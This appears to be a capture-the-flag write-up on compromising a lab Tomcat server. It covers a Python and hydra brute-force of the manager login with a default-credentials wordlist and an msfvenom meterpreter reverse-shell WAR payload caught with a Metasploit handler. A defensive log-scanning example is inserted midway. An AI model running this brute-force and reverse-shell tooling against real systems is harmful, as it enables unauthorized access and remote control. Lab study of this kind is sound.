Jerry (brute-forcing Apache Tomcat)

info enum

8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Apache Tomcat/7.0.88

Apache login: I have run into this before.

Back then the approach was a Python script that turned the wordlist into entries of the form "admin:admin" and then base64-encoded each one.

For convenience (read: laziness) I used Burp's Intruder module to brute-force it.

Drawback: if the wordlist is large, Burp always hangs ==

Now I have hit Apache authentication again. Look at the following request.

GET /manager/html HTTP/1.1
Host: 10.10.10.95:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://10.10.10.95:8080/
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic MTIzMTIzOjMyMTIz

Brute-force script

import base64
import requests

url = "http://10.10.10.95:8080/manager/html"
S = requests.Session()

# wordlist of "user:pass" lines, one candidate per line
user = open("/usr/share/wordlists/tomcat-betterdefaultpasslist.txt", "r")

for each in user.readlines():
    each = each.strip()
    if not each:
        continue
    # strip the trailing newline before encoding; otherwise the base64
    # value carries "\n" and the server never sees a valid credential
    key = base64.b64encode(each.encode()).decode()
    what_the_fuck_pass = "Basic " + key
    headers = {
        'Host': '10.10.10.95:8080',
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Referer': 'http://10.10.10.95:8080/',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
        'Authorization': what_the_fuck_pass,
    }
    send_pass = S.get(url, headers=headers)
    # status_code is an int; comparing it to the string '200' is always False
    if send_pass.status_code == 200:
        print(key)
        break
    else:
        # print(headers)
        print(key + "--error")

user.close()

hydra

apt search seclists
apt-get install seclists
cd /usr/share/seclists/
find . | grep -i tomcat
hydra -C Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.10.10.95:8080/manager/html

Once a weak password is found, you can log in to the server.
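On the defender's side, the same activity is easy to spot: a single client collecting a run of 401s on /manager/html and then a 200 (and, in this box's case, a manager upload) is exactly the hydra pattern above. The following is an added example, not code from the original post: it decodes the Basic header from the request shown earlier into its user:pass form and scans constructed Tomcat access-log lines (default AccessLogValve pattern; the IPs, timestamps and threshold are assumed) for that sequence.

```python
import base64
import re
from collections import defaultdict

# Constructed sample lines in Tomcat's default AccessLogValve pattern
# ('%h %l %u %t "%r" %s %b'); not taken from any real server.
FAIL = '10.10.14.5 - - [12/Jun/2018:10:01:0{} +0000] "GET /manager/html HTTP/1.1" 401 2473'
SAMPLE_LOG = "\n".join([FAIL.format(i) for i in range(6)] + [
    '10.10.14.5 - tomcat [12/Jun/2018:10:01:07 +0000] "GET /manager/html HTTP/1.1" 200 18451',
    '10.10.14.5 - tomcat [12/Jun/2018:10:01:30 +0000] "POST /manager/html/upload HTTP/1.1" 200 18490',
    '192.168.1.20 - admin [12/Jun/2018:10:05:05 +0000] "GET /manager/html HTTP/1.1" 200 18451',
    '192.168.1.20 - - [12/Jun/2018:10:06:00 +0000] "GET /index.jsp HTTP/1.1" 200 11217',
])

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

def decode_basic(header_value):
    """Recover the "user:pass" pair carried by an Authorization: Basic header."""
    scheme, _, b64 = header_value.partition(" ")
    if scheme.lower() != "basic":
        return None
    return base64.b64decode(b64).decode("utf-8", "replace")

def find_manager_bruteforce(log_text, threshold=5):
    """Per client IP, count 401s on /manager/* and flag a 200 that arrives after
    at least `threshold` failures; a manager upload by that client is flagged too."""
    failures = defaultdict(int)
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m.group("path").startswith("/manager"):
            continue
        ip, path, status = m.group("ip"), m.group("path"), int(m.group("status"))
        if status == 401:
            failures[ip] += 1
        elif status == 200 and failures[ip] >= threshold:
            event = ("war-upload-after-bruteforce"
                     if path.startswith("/manager/html/upload") else "bruteforce-success")
            findings.append({"ip": ip, "user": m.group("user"),
                             "failures": failures[ip], "event": event})
    return findings

if __name__ == "__main__":
    print(decode_basic("Basic MTIzMTIzOjMyMTIz"))
    for f in find_manager_bruteforce(SAMPLE_LOG):
        print(f)
```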

Uploading a command-execution script

I have done WAR file uploads before to get a shell.

A WAR file is packaged Java code. The manager page offers "Select WAR file to upload".

Generate the WAR payload with msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali-ip LPORT=9001 -f war -o xx.war

msfvenom

It is used to generate payloads. Reference material

msfvenom -l payload    list all payloads

msfvenom -l formats

Getting a shell

msfconsole
use exploit/multi/handler/
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0    # interface/port to listen on
set LPORT 9001
exploit -j

Once xx.war has been uploaded successfully, visiting the following address gives a shell.

http://target.com:8080/xx/krnlxctxgebr.jsp

sessions -i 1
getuid
shell
Root privileges obtained.